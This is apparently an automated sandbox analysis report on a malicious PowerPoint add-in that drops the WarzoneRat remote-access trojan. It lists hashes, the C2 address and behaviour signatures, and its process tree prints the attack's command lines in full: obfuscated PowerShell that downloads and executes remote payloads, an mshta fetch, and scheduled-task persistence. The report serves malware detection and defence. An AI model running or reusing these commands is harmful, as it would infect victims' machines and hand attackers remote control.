Overview

overview

10

Static

static

IdDetails.ppam

windows7_x64

10

IdDetails.ppam

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-07-2021 14:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IdDetails.ppam

  • Size

    16KB

  • MD5

    8fb67950eee24c33116c5c8ae87bbde1

  • SHA1

    26d8b5eec451ed68f3a61f4f69b4fadffb736d22

  • SHA256

    a524b17edc79f1cacd57f9a07becfd24df6d0ef893d11620cb3c300c86c327ed

  • SHA512

    1c03f7930d08ad4ea8d7fc0f8527d5db6bc618989e8ab9183abe05309d6b9f75f0eef61271059a576e2709a7d6ec5385f206d48ca99eeda9832148fa1117c9e3

Score
10/10
warzoneratinfostealerrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt

Extracted

Family

warzonerat

C2

normanaman.duckdns.org:3009

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Blocklisted process makes network request 24 IoCs
  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\IdDetails.ppam" /ou ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4064
    • C:\Windows\SYSTEM32\mshta.exe
      mshta http://www.bitly.com/ashjdkqowdhqowdh
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3528
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"
          4⤵
            PID:4496
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html\""
          3⤵
          • Creates scheduled task(s)
          PID:3484
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/2.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601403.us.archive.org/11/items/3_20210710_20210710/3.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3616
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            #cmd
            4⤵
              PID:4296
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "{path}"
              4⤵
                PID:4420
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                #cmd
                4⤵
                  PID:4612
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1240 -s 2644
                3⤵
                • Program crash
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4112
            • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
              "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3440
              2⤵
              • Process spawned suspicious child process
              PID:2408
          • C:\Windows\system32\werfault.exe
            werfault.exe /h /shared Global\cc6d463293ce4e6a9a851b75e88ea577 /t 3988 /p 4064
            1⤵
              PID:4324
            • C:\Windows\system32\schtasks.exe
              schtasks /create /sc MINUTE /mo 80 /tn ""BatFile"" /F /tr ""\""C:\Users\Public\clone.vbs""
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4572

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Scheduled Task

            1
            T1053

            Persistence

            Scheduled Task

            1
            T1053

            Privilege Escalation

            Scheduled Task

            1
            T1053

            Defense Evasion

            Credential Access

            Discovery

            System Information Discovery

            1
            T1082

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              MD5

              ba0c69ceb0908b193521106967959098

              SHA1

              44ca77c41d4ab2c17df1c831c41900e4f692f8de

              SHA256

              71f2c3e06e74aa830de694c5a96927e37919c322b8e2ace896a87cbf44b32f55

              SHA512

              cf70230fe5dc40ff2b4d03dd9dedd7444f70430e35da55627ec8963244f47dce150e371b5015e508fed11b02a8e84cad240cd6d251dac2df3037ce149d03ca97

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              MD5

              24c98423fe34f9dde04993e00d3863d1

              SHA1

              866c0e8d72e8d2251adae71db874cae05d2bf721

              SHA256

              2e264c09fbd11a8f304c5c4730dc293d7fd3c95fbca0aa545362ddfb887c56e6

              SHA512

              eb627c291a374e7f6606b30e089cef9713676c91e0c47f4d460c33f7ec5b70749dc0a1da9a70d93eec2e14f717e7954236a70e7407cf82d0167b7c100013cf14

              Download Submit
            • C:\Users\Public\lub.vbs
              MD5

              1edd4ddfe49d879dd3c977804a05b9bd

              SHA1

              17157ecc88f381e568f36b9263044450e9dfccbe

              SHA256

              d8a10361792b7d54e4084a5a9736e3c8e47e805be894b9a7965e48793f591efa

              SHA512

              6a75daef70bb16da4f33f33fe8e7263b35e327205c2c0f0cc1e44445c8103021ff200830698013f9ad8b3179127ae45a9260b8d10a2bc147417dc378d3a6d0df

              Download Submit
            • memory/1240-178-0x0000000000000000-mapping.dmp
              Download
            • memory/3484-188-0x0000000000000000-mapping.dmp
              Download
            • memory/3528-198-0x0000020FB00D0000-0x0000020FB00D1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3528-218-0x0000020F97A86000-0x0000020F97A88000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3528-214-0x0000020F97A83000-0x0000020F97A85000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3528-210-0x0000020F97A80000-0x0000020F97A82000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3528-201-0x0000020FB0280000-0x0000020FB0281000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3528-187-0x0000000000000000-mapping.dmp
              Download
            • memory/3616-217-0x0000029E30733000-0x0000029E30735000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3616-219-0x0000029E30736000-0x0000029E30738000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3616-252-0x0000029E308E0000-0x0000029E308E1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3616-239-0x0000029E48B00000-0x0000029E48B20000-memory.dmp
              Filesize

              128KB

              Download
            • memory/3616-215-0x0000029E30730000-0x0000029E30732000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3616-230-0x0000029E308D0000-0x0000029E308D3000-memory.dmp
              Filesize

              12KB

              Download
            • memory/3616-190-0x0000000000000000-mapping.dmp
              Download
            • memory/3616-224-0x0000029E308B0000-0x0000029E308BB000-memory.dmp
              Filesize

              44KB

              Download
            • memory/4064-118-0x00007FFDC5330000-0x00007FFDC6F0D000-memory.dmp
              Filesize

              27.9MB

              Download
            • memory/4064-115-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/4064-114-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/4064-119-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/4064-122-0x00007FFDC1500000-0x00007FFDC25EE000-memory.dmp
              Filesize

              16.9MB

              Download
            • memory/4064-117-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/4064-123-0x00007FFDBD1B0000-0x00007FFDBF0A5000-memory.dmp
              Filesize

              31.0MB

              Download
            • memory/4064-116-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/4296-225-0x0000000000400000-0x000000000055E000-memory.dmp
              Filesize

              1.4MB

              Download
            • memory/4296-226-0x0000000000405E28-mapping.dmp
              Download
            • memory/4296-229-0x0000000000400000-0x000000000055E000-memory.dmp
              Filesize

              1.4MB

              Download
            • memory/4420-232-0x0000000000405E28-mapping.dmp
              Download
            • memory/4496-237-0x0000000000000000-mapping.dmp
              Download
            • memory/4612-246-0x0000000000405E28-mapping.dmp
              Download